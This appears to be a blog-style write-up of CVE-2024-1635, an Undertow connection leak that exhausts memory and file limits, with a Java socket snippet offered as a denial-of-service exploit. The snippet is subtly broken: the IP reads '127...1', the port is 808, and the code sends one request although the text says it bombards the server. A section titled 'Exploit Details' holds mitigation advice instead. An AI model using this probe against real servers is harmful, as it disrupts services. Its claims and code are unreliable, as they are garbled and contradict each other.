CVE-2024-1635: Undertow Vulnerability in WildFly HTTP-Client Protocol Exhausts Memory and Open File Limits

A critical vulnerability has been found in the Undertow server that supports the wildfly-http-client protocol. This vulnerability can severely impact the performance of the server, leading to both memory and open file limits exhaustion. In this extensive post, we will discuss the details of this vulnerability, including the code snippets that exploit the weakness, links to original references, and the specific exploit details.

Vulnerability Details

The vulnerability exists in the HTTP upgrade to remoting process: When the WriteTimeoutStreamSinkConduit leaks connections if the RemotingConnection is closed by Remoting ServerConnectionOpenListener. Due to this issue, the Undertow WriteTimeoutStreamSinkConduit is not notified of closed connections, causing a connection leak that leads to memory and open file limit exhaustion.

The reason behind the leak is that WriteTimeoutStreamSinkConduit creates a timeout task, and the entire dependency tree leaks via this task. This task gets added to the XNIO WorkerThread, causing a direct link to the Undertow conduit containing the connections, leading to the leak.

The following code snippet demonstrates an exploit that can take advantage of this vulnerability

import java.io.IOException;
import java.io.OutputStream;
import java.net.Socket;
import java.nio.charset.StandardCharsets;

public class UndertowConnectionLeakExploit {
    public static void main(String[] args) throws IOException {
        String targetIP = "127...1";
        int targetPort = 808;

        try (Socket socket = new Socket(targetIP, targetPort)){
            OutputStream out = socket.getOutputStream();
            out.write("POST / HTTP/1.1\r\n".getBytes(StandardCharsets.UTF_8));
            out.write("Host: localhost\r\n".getBytes(StandardCharsets.UTF_8));
            out.write("Upgrade: jboss-remoting\r\n".getBytes(StandardCharsets.UTF_8));
            out.write("\r\n".getBytes(StandardCharsets.UTF_8));
            out.write("\r\n".getBytes(StandardCharsets.UTF_8));
            out.flush();
            socket.close();
        }
    }
}

This exploit bombards the Undertow server with requests to open and close connections, leading it to exhaust its memory and open file limits eventually.

Original References

1. Undertow Official Repository
2. XNIO GitHub Repository
3. WildFly HTTP Client Repository

Exploit Details

To mitigate this vulnerability, developers need to ensure that Undertow's WriteTimeoutStreamSinkConduit is aware of the connection's outermost layer during the connection opening procedure. This awareness will allow Undertow to properly close the connection, eliminating the possibility of the connection leak.

Conclusion

The Undertow vulnerability, CVE-2024-1635, in the wildfly-http-client protocol causes exhaustion of memory and open file limits on servers. It is essential for developers to make sure that the Undertow WriteTimeoutStreamSinkConduit is aware of the outermost layer when closing the connection during the connection opening procedure to avoid any security risks. By following the recommended practices, it is possible to protect servers from this kind of vulnerability.

Timeline

Published on: 02/19/2024 22:15:48 UTC
Last modified on: 03/22/2024 19:15:08 UTC